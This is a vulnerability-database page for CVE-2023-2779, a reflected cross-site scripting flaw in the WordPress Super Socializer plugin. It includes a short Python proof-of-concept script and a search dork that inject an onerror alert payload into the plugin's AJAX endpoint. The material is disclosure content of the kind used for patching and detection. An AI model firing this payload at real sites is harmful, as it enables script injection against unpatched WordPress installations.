Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Super Socializer 7.13.52 Cross Site Scripting

🗓️ 21 Jun 2023 00:00:00Reported by Amirhossein BahramizadehType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 282 Views

Super Socializer 7.13.52 Reflected XSS vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Super Socializer 7.13.52 - Reflected XSS Exploit
26 Jun 202300:00
zdt
BDU FSTEC		The vulnerability of the Super Socializer plugin of the WordPress content management system allows attackers to perform cross-site scripting attacks.
22 Nov 202300:00
bdu_fstec
Circl		CVE-2023-2779
20 Jun 202300:00
circl
CNNVD		WordPress Plugin Super Socializer 跨站脚本漏洞
19 Jun 202300:00
cnnvd
CVE		CVE-2023-2779
19 Jun 202310:52
cve
Cvelist		CVE-2023-2779 Super Socializer < 7.13.52 - Reflected XSS
19 Jun 202310:52
cvelist
Exploit DB		Super Socializer 7.13.52 - Reflected XSS
20 Jun 202300:00
exploitdb
Nuclei		Super Socializer < 7.13.52 - Cross-Site Scripting
28 Jun 202615:08
nuclei
NVD		CVE-2023-2779
19 Jun 202311:15
nvd
OSV		CVE-2023-2779
19 Jun 202311:15
osv
Rows per page
`# Exploit Title: Super Socializer 7.13.52 - Reflected XSS  
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com  
# Date: 2023-06-20  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : Webapps  
# Vendor Homepage: https://wordpress.org/plugins/super-socializer  
# Version: 7.13.52 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-2779  
import requests  
  
# The URL of the vulnerable AJAX endpoint  
url = "https://example.com/wp-admin/admin-ajax.php"  
  
# The vulnerable parameter that is not properly sanitized and escaped  
vulnerable_param = "<img src=x onerror=alert(document.domain)>"  
  
# The payload that exploits the vulnerability  
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}  
  
# Send a POST request to the vulnerable endpoint with the payload  
response = requests.post(url, data=payload)  
  
# Check if the payload was executed by searching for the injected script tag  
if "<img src=x onerror=alert(document.domain)>" in response.text:  
print("Vulnerability successfully exploited")  
else:  
print("Vulnerability not exploitable")  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jun 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.05991
wordpresssuper socializercross site scriptingcve-2023-2779ajax endpointexploitvulnerability
282